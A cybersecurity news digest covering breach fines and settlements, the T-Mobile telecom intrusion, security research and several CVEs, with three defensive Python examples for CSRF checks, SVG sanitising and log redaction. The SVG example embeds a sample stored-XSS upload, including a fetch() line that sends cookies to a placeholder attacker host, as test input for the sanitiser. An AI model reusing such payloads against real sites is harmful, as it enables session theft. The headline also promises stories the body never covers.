Secret CISO 11/16: Rampant Bank Fraud, National Public Data Breach, Twitch Fined in Turkey, T-Mobile Chinese Breach, Cloud Security Myths Debunked

Welcome to today's issue of Secret CISO, your daily dose of cybersecurity news.

Today, we're diving into the rampant bank fraud and data breaches that are putting your personal information at risk. We'll explore how massive data leaks, such as the National Public Data breach, are giving scammers access to billions of Social Security numbers and other consumer data.

We'll also look at how companies like National Amusements theater chain and Amazon's Twitch are facing hefty fines for failing to protect their employees and users from data breaches. In the healthcare sector, we'll discuss the myths surrounding cloud security and how health systems can better protect themselves. In telecom news, T-Mobile has reportedly been hacked in a massive Chinese breach of telecom networks. Meanwhile, Ardagh Glass and Lehigh Valley Health Network are paying out millions in settlements following data breaches.

In the education sector, Otsego Public Schools is alerting families to a data breach that may have resulted in personal information being stolen. And in the entertainment industry, National Amusements failed to protect employee data, affecting over 82,000 individuals nationwide. We'll also discuss what's being done to protect you when your info is compromised in a data breach, and how companies like AWS are enhancing centralized security controls. Stay tuned for more updates and remember, knowledge is the first line of defense. Stay safe out there!

Data Breaches

  1. "National Amusements theater chain to pay $250,000 for failing to protect employees": The company failed to inform affected employees about a data breach for over a year. The breach affected a total of 82,128 individuals nationwide due to lax security practices. Source: Newsday and Brooklyn Eagle
  2. "Turkey fines Amazon's Twitch 2 million lira for data breach": Turkey's Personal Data Protection Board (KVKK) has fined Amazon's live-streaming platform Twitch 2 million lira (about $58,000) over a data breach. The investigation found that Twitch had failed to take adequate security measures beforehand. Source: CNA and US News Money
  3. "T-Mobile hacked in massive Chinese breach of telecom networks": T-Mobile is reported to be among the carriers hit by the Chinese intrusion campaign against telecom networks. The company says that, at this time, its systems and data have not been impacted in any significant way and that there is no evidence of impact to customer information. Source: Reuters
  4. "Ardagh Glass data breach settlement": Ardagh Glass has reached a $2.75 million settlement in a class action lawsuit claiming that the company failed to prevent a 2021 data breach. Thousands of Americans are set to receive up to $11,000 each under the settlement. Source: AS
  5. "Patients at center of data breach case win $65M settlement against Lehigh Valley Health Network": A Pennsylvania judge has cleared the way for a $65 million settlement with Lehigh Valley Health Network in a data breach case. The class-action lawsuit represented cancer patients. Source: DataBreaches.net and WHYY

Security Research

  1. DEEPDATA Malware Exploiting Unpatched Fortinet Flaw to Steal VPN Credentials: Security researchers Callum Roxan, Charlie Gardner, and Paul Rascagneres have identified a new malware family, DEEPDATA, that exploits an unpatched Fortinet flaw to steal VPN credentials. Because no fix was available at the time of reporting, keeping systems updated does not by itself close this hole; affected organizations should watch for a vendor update and treat VPN credentials used on affected systems as potentially exposed. Source: The Hacker News
  2. Enhancing Retail Security through Community Collaboration and Technology: This research emphasizes the importance of leveraging technology and fostering strong partnerships to enhance security measures in retail environments, such as convenience stores and gas stations. Source: CCentral
  3. Cloud Platform Bugs Threaten Smart Home Security: Security researchers at Claroty's Team82 have uncovered 10 vulnerabilities in the widely used OvrC cloud platform. These flaws could potentially threaten the security of smart homes, emphasizing the need for robust security measures in IoT devices. Source: BankInfoSecurity
  4. Common way to test for leaks in large language models may be flawed: Computer security expert David Evans and his colleagues report that the common method of testing whether a large language model leaks its training data may be flawed. If the test is unreliable, models may be passing leak checks while still exposing data, which has significant implications for the security of AI systems. Source: Tech Xplore
  5. Misconfigurations can cause many Microsoft Power Pages sites to expose sensitive data: Research by Costello shows that misconfigured Microsoft Power Pages sites frequently expose sensitive data. The lesson is that low-code platforms need the same configuration review as hand-built applications; the defaults alone do not protect the data behind them. Source: CSO Online

Top CVEs

  1. CVE-2022-20652: A vulnerability in Cisco Tetration's web-based management interface and API subsystem could allow an authenticated, remote attacker to inject arbitrary commands with root-level privileges. The issue arises from insufficient input validation. Cisco has released software updates to address this vulnerability. Source: CVE-2022-20652
  2. CVE-2023-20154: A vulnerability in Cisco Modeling Labs' external authentication mechanism could allow an unauthenticated, remote attacker to access the web interface with administrative privileges. The issue is due to improper handling of certain messages returned by the associated external authentication server. Cisco has released software updates to address this vulnerability. Source: CVE-2023-20154
  3. CVE-2023-20060: A vulnerability in Cisco Prime Collaboration Deployment's web-based management interface could allow an unauthenticated, remote attacker to conduct a cross-site scripting attack. The issue arises from the interface not properly validating user-supplied input. Cisco plans to release software updates to address this vulnerability. Source: CVE-2023-20060
  4. CVE-2022-20853: A vulnerability in the REST API of Cisco Expressway Series and Cisco TelePresence VCS could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack. The issue is due to insufficient CSRF protections for the web-based management interface of an affected system. Cisco has released software updates to address this vulnerability. Source: CVE-2022-20853
  5. CVE-2023-20125: A vulnerability in the local interface of Cisco BroadWorks Network Server could allow an unauthenticated, remote attacker to exhaust system resources, causing a denial of service (DoS) condition. The issue arises from the lack of rate limiting for certain incoming TCP connections. Cisco has released software updates to address this vulnerability. Source: CVE-2023-20125
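
The CSRF item above (CVE-2022-20853) comes down to one design rule: an API that authenticates with a session cookie must verify, on every state-changing request, that the request was actually made by its own front end. The following is an added example, not Cisco's code and not taken from the advisory; it shows the two checks that together give that guarantee. The request shape, the `X-CSRF-Token` header name and the management-UI origin are assumptions for illustration.

```python
"""CSRF checks for a cookie-authenticated REST API.

Added example, not Cisco code and not from the CVE-2022-20853 advisory.
Every mutating request must pass (1) an Origin/Referer check and (2) a
synchronizer-token check bound to the caller's session, so that a page on
another origin cannot drive the API with the victim's cookie.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}            # must never change state
ALLOWED_ORIGINS = {"https://mgmt.example.invalid"}   # assumed management-UI origin


@dataclass
class Request:
    """Minimal stand-in for an HTTP request (constructed for this example)."""
    method: str
    headers: Dict[str, str] = field(default_factory=dict)
    # The CSRF token the server stored in this caller's session at login.
    session_csrf_token: Optional[str] = None


def issue_csrf_token() -> str:
    """Generate a per-session token; the UI echoes it back in X-CSRF-Token."""
    return secrets.token_urlsafe(32)


def _request_origin(req: Request) -> Optional[str]:
    """Browsers send Origin on cross-site POST/PUT/DELETE; fall back to Referer."""
    origin = req.headers.get("Origin")
    if origin:
        return origin
    referer = req.headers.get("Referer", "")
    # "https://host/path" -> "https://host"
    return "/".join(referer.split("/")[:3]) if referer else None


def csrf_violation(req: Request) -> Optional[str]:
    """Return None if the request may proceed, otherwise the reason it is rejected."""
    if req.method.upper() in SAFE_METHODS:
        return None
    # Check 1: the request must come from our own UI. A forged form POST
    # carries the victim's cookie but the attacker's Origin.
    origin = _request_origin(req)
    if origin not in ALLOWED_ORIGINS:
        return f"origin not allowed: {origin!r}"
    # Check 2: the token in the header must match the one bound to the session.
    # An attacker's page cannot read it, so it cannot forge this header.
    sent = req.headers.get("X-CSRF-Token", "")
    if not req.session_csrf_token or not hmac.compare_digest(sent, req.session_csrf_token):
        return "missing or mismatched CSRF token"
    return None


if __name__ == "__main__":
    token = issue_csrf_token()
    legit = Request("DELETE", {"Origin": "https://mgmt.example.invalid",
                               "X-CSRF-Token": token}, token)
    forged = Request("POST", {"Origin": "https://evil.invalid"}, token)
    print("legit  :", csrf_violation(legit))    # None
    print("forged :", csrf_violation(forged))   # origin not allowed
```

The origin check alone is not enough (older clients and some proxies strip `Referer`, and a missing header must be treated as a failure), and the token alone is not enough if it is ever leaked into a URL or a log; the API should require both. Non-browser clients should not use cookies at all but a bearer token or mTLS, which CSRF cannot reach.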

API Security

  1. CVE-2024-11092: The SVGPlus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG file uploads through the REST API, due to insufficient input sanitization and output escaping. This allows authenticated attackers to upload an SVG carrying script that executes whenever a user views the file. Source: Vulners
  2. CVE-2022-39275: A proof of concept has been published for a vulnerability in Saleor's API caused by improper input validation. Vulners rates the exploit as requiring application security experience to execute. Source: Vulners
  3. CVE-2024-38370: GLPI, a free asset and IT management software package, has a vulnerability that allows documents to be downloaded from the API without appropriate rights. Users are advised to upgrade to the latest version. Source: Vulners
  4. CVE-2024-11217: A vulnerability was found in the OAuth-server. OAuth-server logs the OAuth2 client secret when the log level is Debug or higher for OIDC, GitHub, GitLab and Google IdP logins, so anyone with access to the logs obtains the credential. Source: Vulners
  5. CVE-2024-52523: Nextcloud Server has a vulnerability where the API returns user or administrator defined external storage with fixed credentials in plain text if an attacker already has access to an active session of a user. It is recommended to upgrade to the latest version. Source: Vulners
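
The SVG upload issue in CVE-2024-11092 above is worth a closer look because SVG is an XML document that browsers execute like HTML: a `<script>` element, an `onload` handler or a `javascript:` link inside it runs on the site's origin the moment the file is opened. The following is an added example, not code from the SVGPlus plugin or from WordPress; it shows what a REST upload endpoint has to strip before storing the file, and the headers to serve it with as a second line of defence. The deny-list, the sample upload and the header values are assumptions for illustration, not a complete SVG allow-list.

```python
"""Sanitize an uploaded SVG before it is stored or served.

Added example, not code from the SVGPlus plugin or from WordPress. The tag
and attribute lists, the constructed malicious upload and the response
headers are assumptions for illustration.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # serialise back with a default xmlns
ET.register_namespace("xlink", XLINK_NS)

# Elements that execute code or pull in foreign documents (assumed deny-list;
# a production filter should be an allow-list of drawing elements instead).
DANGEROUS_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "use"}
# URL schemes that execute when a browser follows them from an SVG.
DANGEROUS_URL = re.compile(
    r"^\s*(?:javascript|vbscript)\s*:|^\s*data\s*:\s*text/html", re.IGNORECASE)


def _local(name: str) -> str:
    """Drop the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1].lower()


def _scrub(elem: ET.Element, removed: List[str]) -> None:
    """Recursively delete executable children and attributes in place."""
    for child in list(elem):
        if not isinstance(child.tag, str):      # comment / processing instruction
            elem.remove(child)
            continue
        if _local(child.tag) in DANGEROUS_TAGS:
            elem.remove(child)
            removed.append(f"<{_local(child.tag)}>")
            continue
        _scrub(child, removed)
    for attr in list(elem.attrib):
        name = _local(attr)
        # on* = event handlers (onload, onclick, ...); href/xlink:href with an executable scheme
        if name.startswith("on") or DANGEROUS_URL.match(elem.attrib[attr]):
            del elem.attrib[attr]
            removed.append(f"@{name}")


def sanitize_svg(data: bytes) -> Tuple[bytes, List[str]]:
    """Return (cleaned SVG bytes, list of removed tags/attributes).

    Raises ValueError if the root element is not <svg>. Note that xml.etree
    still expands internal entities ("billion laughs"); use defusedxml in
    front of this for untrusted uploads in production.
    """
    root = ET.fromstring(data)
    if _local(root.tag) != "svg":
        raise ValueError("not an SVG document")
    removed: List[str] = []
    _scrub(root, removed)
    return ET.tostring(root, encoding="utf-8"), removed


def svg_response_headers(filename: str) -> Dict[str, str]:
    """Defence-in-depth headers for serving a stored SVG from the site origin.

    The CSP blocks script even if something slipped past the sanitizer, and
    nosniff stops the browser from reinterpreting the body as HTML.
    """
    safe_name = re.sub(r"[^\w.-]", "_", filename)
    return {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; img-src 'self' data:",
        "Content-Disposition": f'inline; filename="{safe_name}"',
    }


# Constructed malicious upload: what an authenticated attacker would POST to
# an upload endpoint that trusts the SVG body as-is.
MALICIOUS_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"'
    b' width="100" height="100" onload="alert(document.cookie)">'
    b"<script>fetch('https://attacker.invalid/?c='+document.cookie)</script>"
    b'<a xlink:href="javascript:alert(1)"><circle cx="50" cy="50" r="40" fill="red"/></a>'
    b'<image width="10" height="10" href="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"/>'
    b"</svg>"
)

if __name__ == "__main__":
    cleaned, removed = sanitize_svg(MALICIOUS_SVG)
    print("removed:", removed)
    print(cleaned.decode())
```

Sanitizing at upload time is the primary fix, since the stored file is served many times; the headers cover the case where an older, unsanitized file is already on disk. Files embedded through `<img>` never run script, so the realistic attack path is a victim opening the uploaded file's URL directly.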

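CVE-2024-11217 above is a pattern that recurs across projects: a credential is included in a debug message, the message is considered harmless because Debug is off in production, and then someone turns Debug on to chase a login problem. The following is an added example, not code from the OAuth-server project; it shows a logging filter that scrubs secret-bearing fields from every record before any handler writes it, so raising the log level cannot leak the client secret. The field names, logger name and log lines are constructed for illustration.

```python
"""Redact credential fields before they reach any log handler.

Added example, not code from the OAuth-server project named in
CVE-2024-11217. Field names, logger name and sample log lines are
constructed for illustration.
"""
import io
import logging
import re
from typing import List

# Field names whose values must never be written to a log sink (assumed list).
SECRET_KEYS = ("client_secret", "clientSecret", "password", "access_token", "refresh_token")

# Matches  key=value, key: value, "key": "value", 'key': 'value'
# and keeps the key so the log line stays readable.
_SECRET_RE = re.compile(
    r"(?P<key>\b(?:" + "|".join(SECRET_KEYS) + r")\b[\"']?\s*[=:]\s*[\"']?)"
    r"(?P<val>[^\s,\"'&}]+)",
    re.IGNORECASE,
)


def redact(text: str) -> str:
    """Replace every secret value in text with a fixed marker."""
    return _SECRET_RE.sub(lambda m: m.group("key") + "[REDACTED]", text)


class SecretRedactingFilter(logging.Filter):
    """Rewrite the record's final message; returns True so the record is still logged."""

    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = redact(record.getMessage())   # fold in args first, then scrub
        record.args = ()                           # args are already in msg
        return True


def capture_debug_log() -> List[str]:
    """Emit two Debug-level records through the filter and return what the handler wrote."""
    buf = io.StringIO()
    logger = logging.getLogger("oauth.example")
    logger.setLevel(logging.DEBUG)
    logger.propagate = False
    logger.handlers.clear()
    handler = logging.StreamHandler(buf)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    # Attached to the handler, the filter runs on every record this sink writes,
    # whichever logger produced it.
    handler.addFilter(SecretRedactingFilter())
    logger.addHandler(handler)
    # Constructed log lines modelled on an IdP login traced at Debug level.
    logger.debug("idp config: client_id=%s client_secret=%s", "app-123", "s3cr3t-value")
    logger.debug('token request: {"grant_type": "client_credentials", "client_secret": "s3cr3t-value"}')
    return buf.getvalue().splitlines()


if __name__ == "__main__":
    for line in capture_debug_log():
        print(line)
```

The filter is a safety net, not the fix: the right change is to never pass the secret to the logger at all, and to rotate the client secret once it has appeared in any log. A pattern-based redactor also only catches the field names it knows, so keep the list in one place and review it whenever a new credential type is added.
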
Sponsored by Wallarm API Security Solution

Final Words

As we wrap up today's edition of Secret CISO, it's clear that data breaches and security threats are rampant and ever-evolving. From bank fraud to data leaks, no sector is immune. It's crucial to stay informed and vigilant, and that's where we come in. We hope that our daily updates help you navigate the complex landscape of technical security.

Remember, your data could be anywhere, and it's up to you to protect it. Stay tuned for more updates and don't forget to share this newsletter with your friends and colleagues.

Together, we can create a safer digital world. Stay secure!

By Secret CISO